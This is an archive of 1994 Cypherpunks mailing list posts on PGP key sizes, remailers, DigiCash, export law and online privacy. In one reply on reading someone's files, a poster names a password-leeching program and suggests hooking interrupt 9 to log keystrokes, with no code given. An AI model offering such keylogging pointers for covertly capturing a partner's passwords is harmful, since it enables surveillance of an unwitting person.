I've read on their W3 server]. Of course, I could tell you more exactly had they replied to any of my four separate attempts to try it out .. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From pstemari at erinet.com Sat Dec 24 06:53:02 1994 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Sat, 24 Dec 94 06:53:02 PST Subject: FRAUD: Progress & Freedom on the Web-Frontier? Message-ID: <9412241444.AA05897@eri> At 05:39 AM 12/24/94 -0800, Dave Del Torto forwarded someone else's writings: [...] > Even more has been written about the most famous Gopac document, > > ... a memo by Gingrich called "Language, a Key Mechanism of > Control", in which the then-House minority whip gave candidates > a glossary of words, tested in focus groups, to sprinkle > in their rhetoric and literature. For example, it advised > characterizing Democrats with such words as "decay, sick, > pathetic, stagnation, corrupt, waste, traitors". (LA Times, > 12/19/94, pages A31) Paging Prof. Chomsky, paging Prof. Chomsky... This is exactly the sort of information manipulation that can create a chain reaction on the net. The infamous modem tax is a good example of this sort of cascade effect. Use of "hot button" terms can product astonishing effects. > How does this model scale to 200,000-plus people? Well, at that > point it starts to sound a lot like the information superhighway > -- a technology for centralized broadcast of programs to a group > that isn't the "mass audience" of conventional TV broadcasting > but is distributed across the country. More tailored programming > could be distributed as well -- to particular geographical > regions, to activists on particular issues, and so forth. It's > not a decentralized model like the Internet, but then it's not > the political vision that normally goes with the Internet either. > It's closer to the asymmetrical distribution model found in the > plans of many cable and regional phone companies -- some of whom, > you might recall, sponsored the Progress and Freedom Foundation's > conference. Yawn--this is the same old crappy broadcast paradigm that every govt drone that has looked at the net insists on regurgitating out of their craw. The nature of the net is that everyone is a broadcaster, and the concept of a band of Newt-clones spamming the net is annoying. It's good that these people are this clueless--someone that selectively and judiciously inserted a few posts here and there on appropriate newsgroups could have quite an effect, given an understanding of the language manipulation techniques mentioned above. > As a case study in these issues, let's consider an organization > called the Wireless Opportunities Coalition. The WOC has [posted a web page with minimal credits for sponsorship] > Why is it "idi.net" and not "idi.com"? Never mind. My point > is not that these folks are evil or that they have no right > to speak. My point is that they are a public relations firm > practicing their craft on the Internet. In the future, I expect > that ordinary citizens using the Internet will want to inform > themselves about who's behind all of those slick web pages. This gets right down to one of the fundemental differences between Usenet news and the WWW. The Web is essentially a broadcast model for information exchange, even though everyone can publish their own Web page. News & mailing lists, OTOH, give everyone involved an opportunity to respond and point out stuff that is complete bullshit. Until you can hang responses off of Web pages, it will never give the value of the newsgroups and mailing lists, despite all the fancy fonts and glitzy graphics on the Web pages. --Paul J. Ste. Marie From entropy at IntNet.net Sat Dec 24 07:15:17 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Sat, 24 Dec 94 07:15:17 PST Subject: reading someone's files In-Reply-To: <9412232026.AA22580@webster.imsi.com> Message-ID: > I'm suprised that no one has given the obvious answers on this > topic. If you have physical access to someone's machine, it is trivial > to find out what their encryption keys are. After all, the victim > types into the machine regularly -- recording all their keystrokes is > not a difficult matter at all. Indeed. Archie for DEPL.ZIP or DEPLSRC.ZIP - the program is called Delam's Elite Password Leecher (sic) and will do exactly this task. Also you could write a 5 minute TSR in the language of your choice to hook interrupt 9 and write to a logfile; examples of this are all over the net. If you must, post to alt.2600 asking for one, and 18,000 k0de k1ddies will mail you back uu'd copies. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From grendel at netaxs.com Sat Dec 24 08:05:15 1994 From: grendel at netaxs.com (Michael Handler) Date: Sat, 24 Dec 94 08:05:15 PST Subject: DDJ editorial In-Reply-To: <199412241236.EAA13217@netcom14.netcom.com> Message-ID: On Sat, 24 Dec 1994, Harry Bartholomew wrote: > I think this sentence was missing a NOT: > > If, as some claim and RSA disputes, the > code was reverse-engineered from object files in off-the-shelf software, > then the law was probably broken - unless RSA and other vendors decide to > test the strength of highly questionable and likely unenforceable > shrink-wrap licenses that try to prohibit disassembly/decompilation. No, that's correct as printed. -- Michael Handler Philadelphia, PA Civil Liberty Through Complex Mathematics s.s.y.g-l-b co-moderator You're only as elegant as your actions let you be From Piete.Brooks at cl.cam.ac.uk Sat Dec 24 08:23:41 1994 From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks) Date: Sat, 24 Dec 94 08:23:41 PST Subject: FRAUD: Progress & Freedom on the Web-Frontier? In-Reply-To: Message-ID: <"swan.cl.cam.:131990:941224162332"@cl.cam.ac.uk> How do you feel about it being tweaked ? e.g. the TOC should include all chunks, including basic use, etc. From eric at remailer.net Sat Dec 24 08:50:02 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 24 Dec 94 08:50:02 PST Subject: Thoughts on 15 day CJ crypto In-Reply-To: <199412241111.DAA01099@unix.ka9q.ampr.org> Message-ID: <199412241747.JAA21620@largo.remailer.net> From: Phil Karn Isn't it common practice to pad out a plaintext block with random garbage to the size of the modulus before you RSA-encrypt it? [...] Wouldn't this thwart the kind of attack you describe? It would, but not having ever applied for a 15-day CJ, I can't speak to the details of what the implementations actually do. Perhaps they permit random padding, perhaps not. It's certainly possible that the padding is required to be fixed; that certainly in the style of NSA 'requests' for 'features'. Can anybody here shed some light on the subject? Eric From arromdee at blaze.cs.jhu.edu Sat Dec 24 12:06:58 1994 From: arromdee at blaze.cs.jhu.edu (Ken Arromdee) Date: Sat, 24 Dec 94 12:06:58 PST Subject: Breaking into girlfriend's files Message-ID: <9412242006.AA11428@toad.com> Black Unicorn: >1> All potentially damaging information, by virtue of it's potential >"wrongful use" shall be banned. >2> All information clearly going to be used for the "wrong purposes" >shall be restricted. >The result in 1>, I think is quite clear. >The result in 2>, requires some ONE, some GROUP to decide what is and is >not A> "clearly going to be used for," B> "the wrong purposes." ... >You end up with either a cut throat thought police regime, or slightly >less offensive paternalistic censorship. You choose, what is it you want >to have? Any individual has the right to decide what information to give out. If that means the individual has to judge someone else's purposes, then so be it. The individual may even try to persuade others not to give out the information. It only becomes a problem if he's trying to use force--to keep others who _do_ want to reveal the information, from revealing it. This is _the_ difference between the current situation, and real police state censorship; censorship prevents someone from speaking who wants to speak; it doesn't merely mean that the government itself won't speak to you. -- Ken Arromdee (email: arromdee at jyusenkyou.cs.jhu.edu) "No boom today. Boom tomorrow, there's always a boom tomorrow." --Ivanova From klp at epx.cis.umn.edu Sat Dec 24 13:01:55 1994 From: klp at epx.cis.umn.edu (klp at epx.cis.umn.edu) Date: Sat, 24 Dec 94 13:01:55 PST Subject: Breaking into girlfriends files. Message-ID: <0012efc8c39013387@epx.cis.umn.edu> Oddly enough, I'm on the other end of this situation right now with someone I know. The basic facts are this person keeps a journal, until recently on paper. Her husband got ahold of it and based on some stuff she had written decided to cause a big fuss (not really willing to go into the whole details, it's a loooong story). So she burned the journal, and was bummed that she could no longer keep one for fear of a repeat of the situation. Knowing she has a macintosh at home, I mentioned PGP to her, and am in the process of getting her set up with a copy. Of course I'm informing her of the limitations, and such, so that she can take precautions so that what she wishes to keep private can remain private. Another crypto convert? I don't know. But I think she'll be ahead of 98% of the population in that she has a tool to keep her privacy, and she's fully aware of what it is, and the limitations. And that's not a bad days work for this kid :) -- Kevin Prigge internet: klp at epx.cis.umn.edu CIS Consultant MaBellNet: (612)626-0001 Computer & Information Services SneakerNet: 152 Lauderdale From david.lloyd-jones at canrem.com Sat Dec 24 13:23:29 1994 From: david.lloyd-jones at canrem.com (David Lloyd-Jones) Date: Sat, 24 Dec 94 13:23:29 PST Subject: EXPORT CONTROLS ON RC In-Reply-To: <199412241744.JAA21614@largo.remailer.net> Message-ID: <60.18015.6525.0C1C590D@canrem.com> EH+The commerce clause applies to Congress, not the executive branch, of +which the State Dept is part. Bzzzt, Eric. The Constitution applies to the whole shootin' match. Congress, Executive, States, agencies, CIA, you name it. -dlj. david.lloyd-jones at canrem.com * 1st 1.11 #3818 * #include From m5 at vail.tivoli.com Sat Dec 24 14:16:16 1994 From: m5 at vail.tivoli.com (Mike McNally) Date: Sat, 24 Dec 94 14:16:16 PST Subject: EXPORT CONTROLS ON RC In-Reply-To: <199412241744.JAA21614@largo.remailer.net> Message-ID: <9412242216.AA21275@vail.tivoli.com> David Lloyd-Jones writes: > EH+The commerce clause applies to Congress, not the executive > +branch, of which the State Dept is part. > > Bzzzt, Eric. The Constitution applies to the whole shootin' match. > Congress, Executive, States, agencies, CIA, you name it. I think you should read the Constitution more carefully. | GOOD TIME FOR MOVIE - GOING ||| Mike McNally | | TAKE TWA TO CAIRO. ||| Tivoli Systems, Austin, TX: | | (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" | From blancw at pylon.com Sat Dec 24 19:29:08 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Sat, 24 Dec 94 19:29:08 PST Subject: To Cpunks EveryWhere Message-ID: <199412250329.TAA25229@deepthought.pylon.com> {000} [[[[[[[[[[]]]]]]]]]]]]]]] Q=%=QAtwhDbN/799e763=%=ho PiiE/////iRWQfoVPmME6fMYlU/////luLonSm mHk8/////D\\\\\Y0j4udH2oqvd6V/////gsN\\\\\bQeFC r3Lt/////25wSZ\\\\\lQ8BAXQw/////wIxBaxEM\\\\\ER9o 969/////XgnnoKybR\\\\\ +Zfli/////drRyt40MIkg1/Z5\\\\\Lg02 Ct7iHDbjkcn+!MerryChristmasCypherpunks!+3BF34RD d0+ezN5NM+2v4P5+&Tim+&+LD,too+GJ/lxi+exc6+C/m BrDqwa((@))((@0nGwiq((@))((@))XjrxlQ((@))((@))m suq((@))OI2l((@KSzy((@))0+((@))ptx((@))JiF((@) @))O+DcU((@))((@))VAgU((@))((@))6I8ZrPn \3xjsTLiUx((@))Mkxko/lnIR((@))oy9T42/ \eXORJOjaj4P5LRbYeRm2Ve8O/ \u830e3zt+b4Tmj7fe3u/ \ \VYVYVYVYV/ / ^*^*^*^*^ +*+*+ :: : . .. Blanc From an169306 at anon.penet.fi Sun Dec 25 03:22:09 1994 From: an169306 at anon.penet.fi (an169306 at anon.penet.fi) Date: Sun, 25 Dec 94 03:22:09 PST Subject: A Secure Christmas Message-ID: <9412251056.AA03743@anon.penet.fi> Here is to everyone having a cryptographically secure Christmas! BTW: PGP 2.6.2 now gives 2047 bit keys, a nice present from Derek and the other underpaid, overworked PGP coders. ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From ddt at lsd.com Sun Dec 25 05:25:21 1994 From: ddt at lsd.com (Dave Del Torto) Date: Sun, 25 Dec 94 05:25:21 PST Subject: PSWD: "The Girlfriend's Opinion" Message-ID: At 8:28 pm 12/23/94, Black Unicorn wrote: >Who the hell are you to define the position of cypherpunks? >Who the hell are any of us to do this? Both interesting questions... and self-cancelling ones. As far as I know, Cypherpunks define their own personal positions and don't impose theirs on any one else, as you yourself seem to have done, Uni. Your argument, much like your "standard" is somewhat suspect in my view. Regarding your language: please tone it down a little? Rely less on ad hominem flames and the word "shit" and more on the strength of your arguments and I'd be more inclined to respect your opinions. Once I pick through your invective, you "seem" to have a point, but you really do go on a bit, making it a lot of work... are you sober as you write these things? On the topic: let me relay an interesting little tidbit I heard recently on radio (Fresh Air/NPR): the forensic psychiatrist who interviewed Jeffery Dhaumer (sp?) noted that he declines in his book(s) to describe the precise methods utilized by the killers he investigates in his book, because he feels that this will provide specific information directly to other psychopaths on how to be more effective in committing horrible crimes and eluding law enforcement. I think this rather closely parallels the posting of specific information on how to compromise the security of systems. Personally, I support his practice: while he does a very good job of describing things so that you can understand _why_ a killer did his deeds and possibly something of _how_ so that _you_ can avoid being killed by someone trying the same things, he doesn't compromise his responsibility as a physician. An interesting parallel. Privacy is Privacy, even if it's your intimate friend's privacy. Just because someone trusts you, it doesn't give you any rights to their personal data. I've had supposed "friends" try to break into my personal files before, so I wouldn't presume to pontificate on who deserves more privacy: everyone does. The free flow of information on system security is important, but when it sacrifices someone's privacy. If you intend to post information on how a system can be compromised, it seems to me that the responsible thing to do (as a cypherpunk or a physician) is to first notify the sysadmin or password-owner so as to make sure they've been able to close their doors, and THEN post the info to others judiciously using only enough detail as is necessary for educational purposes (like the doctor above). Uni, you don't work at a nuclear site, do you? ;) Ahem. Let's move on... __________________________ BTW, a collective "thanks" to the few of you who have so far sent in Q&A material for the Beginner's PGP-FAQ. By and large, they are all helpful suggestions. My only feedback for now is to remind you all that this has to be VERY basic conceptual material. As the rest of you (hopefully) send me stuff, please keep this in mind. Imagine you're explaining WHY crypto to a five-year-old, and HOW PGP to a six-year-old. :) We really have to aim low on this one. I'll be working on this for a while and will post a draft for you all to review as soon as it's ready. dave ___________________________________________________________________________ "Rudeness is the penultimate refuge of the Incompetent; violence, the last" From rah at shipwright.com Sun Dec 25 05:26:40 1994 From: rah at shipwright.com (Robert Hettinga) Date: Sun, 25 Dec 94 05:26:40 PST Subject: To Cpunks EveryWhere Message-ID: <199412251326.IAA25534@zork.tiac.net> At 7:29 PM 12/24/94 -0800, blancw at pylon.com wrote: > Ct7iHDbjkcn+!MerryChristmasCypherpunks!+3BF34RD Yeah, what she said. ;-) (Holiday) Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From ddt at lsd.com Sun Dec 25 06:07:03 1994 From: ddt at lsd.com (Dave Del Torto) Date: Sun, 25 Dec 94 06:07:03 PST Subject: No privacy with DigiCash Message-ID: At 6:39 am 12/24/94, Jonathan Cooper wrote: >> one of the big selling points of DigiCash. Is there something I am >> overlooking, some way to buy things privately with DigiCash? > > I don't think so. It appears that the initial implementation of >DigiCash works exactly that way [based on what I've read on their W3 >server]. Of course, I could tell you more exactly had they replied to >any of my four separate attempts to try it out .. Interesting. I too have made four requests and still not received any software. Can you say "vapor?" dave _________________________________________________________________________ "You can put your shoes in the oven, but that don't make 'em biscuits." From lce at wwa.com Sun Dec 25 13:22:34 1994 From: lce at wwa.com (Larry E) Date: Sun, 25 Dec 94 13:22:34 PST Subject: 2048-bit key...I'm leery Message-ID: <63U$kG9s18wO075yn@wwa.com> Ok, call me a skeptic. I made to tries at generating a 2048-bit key on my 33-MHZ 386 machine using PGP 2.6.2. Yes, I know I only get 2047 bits, but that's not what bothers me. What bothers me is the first key generation only took thirty seconds, and the second one under ten minutes. Two questions: 1) Why such disparity in the two times? 2) Can the key generation possibly be done on my machine that quickly? I was expecting it to take at least several hours, based on what I've been reading in the cryptology groups. From entropy at IntNet.net Sun Dec 25 13:43:14 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Sun, 25 Dec 94 13:43:14 PST Subject: Moving from 1024-bit -> 2048-bit key. In-Reply-To: <63U$kG9s18wO075yn@wwa.com> Message-ID: Once I've generated a 2048-bit key, how can I update my key on the keyservers? -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From jcorgan at scruznet.com Sun Dec 25 14:03:03 1994 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Sun, 25 Dec 94 14:03:03 PST Subject: 2048-bit key...I'm leery Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >2) Can the key generation possibly be done on my machine that >quickly? I was expecting it to take at least several hours based on >what I've been reading in the cryptology groups. My first try took about twenty minutes on a 486/50. Second try was about 15 minutes on a 486/66. ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at scruznet.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLv3mk+lPfVlQ1n99AQGz9Qf/Rdn+OQjX9Z6gXiMCZ+N6iHJhvDBVMyRm 7o8xHM/BO1x5ELfRS/aBWHwjRei61woEhGY5fo2QZQkAZw7LgKQ9fQlhuQyiEkg/ bNrwwS1KXPhfSOKn4xexSkRL2T7BEoipPOs+8lVwKBfZsKfVqK534wjYtXiEqEt0 QPqGkUPbdRxC54Vt2CxaKqMu6MInh6M8I6yoWhXDBRBwTq4LXN5Rg14ecIWr2++Q y6ECqnqqHCyR9ugfweF61tmJL8JkEXdCcr3hFn9S4/Z88ep7i6+4fJQVJ64GTs5J wiSWFUiMRemtbMx6t/RKE8oXZYYm+0VRqQqVKeKoKEGQOh4Hiikccg== =CD8i -----END PGP SIGNATURE----- ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at scruznet.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= From warlord at MIT.EDU Sun Dec 25 14:12:12 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Sun, 25 Dec 94 14:12:12 PST Subject: 2048-bit key...I'm leery In-Reply-To: <63U$kG9s18wO075yn@wwa.com> Message-ID: <9412252212.AA06148@toxicwaste.media.mit.edu> For the first key you were just plain lucky. Most likely the first or second number you tried happened to be a prime, so it found its p and q fairly easily. Thats all. The 10 minutes is much closer to the average expected time.. But the probability is linear between the two primes you choose, so you happened to choose _just before_ a prime. Lucky you! -derek From warlord at MIT.EDU Sun Dec 25 14:12:59 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Sun, 25 Dec 94 14:12:59 PST Subject: Moving from 1024-bit -> 2048-bit key. In-Reply-To: Message-ID: <9412252213.AA06153@toxicwaste.media.mit.edu> You don't "update" your key, you add your new one, so now you have two keys on the keyservers; your old one and your new one. -derek From plutt at mtek.chalmers.se Sun Dec 25 17:06:20 1994 From: plutt at mtek.chalmers.se (Pelle Johansson) Date: Sun, 25 Dec 94 17:06:20 PST Subject: Breaking into girlfriend's files In-Reply-To: Message-ID: Is Lance back "creating" pretty flamewars? He must be amused by the fact that it's really easy. -- Pelle Johansson, Norra Kroksl�ttsgatan 15B | plutt at mtek.chalmers.se 41264 G�teborg, Sweden. | Voice +46-31-358598 anarchrist at igormud, ny.mtek.chalmers.se 1701 | Beeper 0740-116326 "Destruction is not bad. You have to destruct to build." - B. Bargeld. From ddt at lsd.com Mon Dec 26 05:49:11 1994 From: ddt at lsd.com (Dave Del Torto) Date: Mon, 26 Dec 94 05:49:11 PST Subject: good blaze quote Message-ID: At 9:41 pm 11/9/94, Matt Blaze wrote: >Cypherpunks write code, and design protocols, and analyze ciphers, and >assess risks, and write articles, and attend conferences, and lobby >Congress, and in general look at the world with a critical eye. I was just going through some old mail and found this nice quote from one of our own. BTW, thanks for those pointers to Rivest's RC5 materials...I'm just getting around to them but they're very educational. dave __________________________________________________________ I have a flawless philosophic/scientific model of reality. Unfortunately, it's actual size. From raph at CS.Berkeley.EDU Mon Dec 26 06:50:09 1994 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 26 Dec 94 06:50:09 PST Subject: List of reliable remailers Message-ID: <199412261450.GAA25182@kiwi.CS.Berkeley.EDU> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"vox"} = " cpunk pgp. post"; $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"rebma"} = " cpunk pgp hash"; $remailer{"jpunix"} = " cpunk pgp hash latent cut post ek"; $remailer{"c2"} = " eric pgp hash"; $remailer{"soda"} = " eric post"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub"; $remailer{"usura"} = " cpunk pgp. hash latent cut post"; $remailer{"desert"} = " cpunk pgp. post"; $remailer{"nately"} = " cpunk pgp hash latent cut"; $remailer{"xs4all"} = " cpunk pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk pgp hash latent cut post ek"; $remailer{"rahul"} = " cpunk"; $remailer{"mix"} = " cpunk hash latent cut ek"; $remailer{"q"} = " cpunk hash latent cut ek"; catalyst at netcom.com is _not_ a remailer. Last ping: Mon 26 Dec 94 6:00:25 PST remailer email address history latency uptime ----------------------------------------------------------------------- alumni hal at alumni.caltech.edu +*********** 3:37 99.99% usura usura at replay.com +*********** 4:41 99.99% nately remailer at nately.ucsd.edu ++++++++++++ 45:12 99.99% portal hfinney at shell.portal.com *******#*#*# 1:52 99.99% penet anon at anon.penet.fi +*********** 22:14 99.99% mix mixmaster at nately.ucsd.edu ++++++-+++++ 55:05 99.99% ideath remailer at ideath.goldenbear.com +******++* + 1:33:50 99.99% vox remail at vox.xs4all.nl --...-..-..- 15:24:27 99.99% rahul homer at rahul.net ****-----*** 38:39 99.90% soda remailer at csua.berkeley.edu ........-. 9:26:00 99.88% desert remail at desert.xs4all.nl --.-...---- 14:54:03 99.99% q q at c2.org +--++- -- 7:56:13 99.51% c2 remail at c2.org ++-++ -- 6:16:43 98.96% xs4all remailer at xs4all.nl +**** * **** 4:56 98.85% flame tomaz at flame.sinet.org **+* +*** * 6:03 97.30% rebma remailer at rebma.mn.org ..-.------*+ 10:22:19 97.32% jpunix remailer at jpunix.com **+* +*** * 5:38 97.26% bsu-cs nowhere at bsu-cs.bsu.edu *******+* - 8:30:01 93.77% extropia remail at extropia.wimsey.com _ .+.-+* 32:24:15 81.95% For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). Options and features cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. oldpgp Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. special Accepts only pgp encrypted messages. ek Encrypt responses in relpy blocks using Encrypt-Key: header. Comments and suggestions welcome! Raph Levien From grmorgan at freenet.vcu.edu Mon Dec 26 11:07:25 1994 From: grmorgan at freenet.vcu.edu (Greg Morgan) Date: Mon, 26 Dec 94 11:07:25 PST Subject: Moving from 1024-bit -> 2048-bit key. Message-ID: <9412261907.AA10983@freenet.vcu.edu> > >Once I've generated a 2048-bit key, how can I update my key on the >keyservers? > First you need to generate a key revocation for your old key and post that to the servers. Then just email your new key to the server. I think the command to revoke a key is PGP -kr but check the manual/help files to be sure... I haven't had to revoke a key yet so that's why I'm a little fuzzy. Later... Greg Morgan -- ----------------------------------------------------------------------------- Greg Morgan | "I dunno Brain, me and Pipi From adam at bwh.harvard.edu Mon Dec 26 12:14:24 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 26 Dec 94 12:14:24 PST Subject: Moving from 1024-bit -> 2048-bit key. In-Reply-To: <9412261907.AA10983@freenet.vcu.edu> Message-ID: <199412261959.OAA17978@bwh.harvard.edu> Why revoke the old one? If I want to send a message I don't think needs 2048 RSA bits of security, why bother with it? I have little doubt the FBI would get your key from your computer at 1024 bits. Thus, the effort needed to compromise a key does not change as one moves from a 1024 to a 2048 bit key. Threat models are really helpful. They become more helpful as one acurately assesses ones enemies. Ronald Kessler wrote a book called The FBI. Its fairly evenhanded examination of the post-Hoover bureau. He does gloss over DT & Waco; they occured as he was finishing the book. Reading it will give you good insight into the way the FBI, and its agents, work. (0-671-78657-1) Adam | >Once I've generated a 2048-bit key, how can I update my key on the | >keyservers? | > | | First you need to generate a key revocation for your old key | and post that to the servers. Then just email your new key to | the server. -- "It is seldom that liberty of any kind is lost all at once." -Hume From an169306 at anon.penet.fi Mon Dec 26 13:34:07 1994 From: an169306 at anon.penet.fi (an169306 at anon.penet.fi) Date: Mon, 26 Dec 94 13:34:07 PST Subject: Moving from 1024-bit -> 2048-bit key. Message-ID: <9412262107.AA03674@anon.penet.fi> I am wondering if going to 2048 bits is worth it or not. After a certain point, it doesn't matter whether it takes 200 quadrillion years or 200 decillion years to factor a key, it will be a long time before its factored ;-). Perhaps keep your 1024 bit key, unless you want to expire it and generate a new one. (I did that, expired two keys, replaced them with a 2048 bit key, but realize that a 2048 bit key takes somewhat more time and processing power to do the usual PGP hijinks with. I probably would be better off just using a 1500 bit key, but too late now...) Just remember (so your web of trust stays intact) to sign your new key and use your new key to sign your old one before revoking the old key. This confirms that it IS a new key, rather than someone trying to spoof you. Also, keep a backup of your public and secret keyrings before revoking the old key. This is just common sense. Make sure your backup is secure, though. (I PKZIP my PGP stuff, encrypt it several times with convential key encryption, wnstorm it, THEN lastly use Norton Diskreet with a password that is different from all the rest. If Diskreet is not secure, PGP and wnstorm are, so I don't really care if Diskreet has holes in it or not. Its just there to 'spice things up' for anyone trying to crack the backup, which is stored in a place any party I authorize or I can easily get at it. If anyone sees something weak about this, E-mail me... ;-) The main thing is not to go keysize crazy which I did, as you do pay a performance penalty for those huge keys, and make sure that your other avenues of attack are defended against. (As soon as I can, I am buying a portable 486 or Pentium, since my main weakness is a 'black bag' attack using a good keystroke monitor or a hardware bug, then a simple copy of the secring file when I mount my SecureDrive partion and the Stacker partition inside of that to access my PGP stuff.) ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From an109574 at anon.penet.fi Mon Dec 26 14:01:08 1994 From: an109574 at anon.penet.fi (an109574 at anon.penet.fi) Date: Mon, 26 Dec 94 14:01:08 PST Subject: voice encryption for portable PCs Message-ID: <9412262136.AA14518@anon.penet.fi> One of the problems with Philip Zimmermann's very worthy voice encryption project is the lack of support for PC laptops, notebooks and palmtops that lack soundcards. If anyone involved in this project is listening, please consider creating a version that will work well with the PCMCIA "Wavejammer" card or some other peripheral soundcard substitute. Cogon Electronics Inc., as has been discussed in this group, markets a voice encryption program called Aquafone that employs Diffie-Hellman+triple DES. The current version uses a push-to-talk feature like a CB radio, but the company plans a fully duplexed version in March. Like the Zimmermann project, the Aquafone uses a standard soundcard. The company reports mixed results using Wavejammer cards. The audio quality afforded by the Wavejammer is noticeably inferior to that of a soundcard. Seems the audio digitization algorithms would have to be tweaked to optimize the fidelity using the Wavejammer. BTW, please don't misconstrue this as an advertisement for Wavejammer or Aquafone. I fully expect Phil's voice encryption software to become the de facto telephonic standard just as PGP became the Internet standard. Cogon's Aquafone, while commendable, has the disadvantage of employing DES. I presume Phil will select a more resilient conventional algorithm. Cogon also lacks Phil's cachet as certified by his fans at Justice and Customs. And, of course, the Zimmermann software will be freeware. Likewise, I mention Wavejammer because that is the only PCMCIA substitute for a soundcard with which I am familiar. If someone can suggest other solutions to the sound card deficiency in PC laptops and notebooks -- short of buying a Mac or restricting one's selection to the few PC portables that have internal soundcards -- please do. I don't regularly monitor this group, so I would greatly appreciate any replies by e-mail. This is an important problem to solve. After cryptanalysis, traffic analysis is the biggest threat to secure telephony. A readily portable PC armed with Phil's voice encryption program represents a real dilemma for traffic analysts since one or both targeted parties are no longer tied to specific telephones. I am neither a telecommunications expert nor a programmer. I am a civil liberties activist. Periodically, from the safety of the United States, I must communicate with people whose courage and idealism puts them in jeopardy of hostile parties. PGP is quite popular in such circles. As you might expect, Phil's voice encryption software is awaited with equal enthusiasm. ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From bryce at cybernet.co.nz Mon Dec 26 19:15:42 1994 From: bryce at cybernet.co.nz (Bryce Boland) Date: Mon, 26 Dec 94 19:15:42 PST Subject: Moving from 1024-bit -> 2048-bit key. Message-ID: >Just remember (so your web of trust stays intact) to sign your new key >and use your new key to sign your old one before revoking the old key. >This confirms that it IS a new key, rather than someone trying to >spoof you. You would want to sign your new key with your old key wouldn't you? Anyone can add a signature to your old key, but only you can add your (old key's) signature to a new key. I agree that signing your old key with your new key is probably a good idea, as it shows that the owners of the key (the same person) trust that the keys belong to who they say they are. ------------------------------------------------------------------------------- Bryce Boland Finger for PGP Public Key 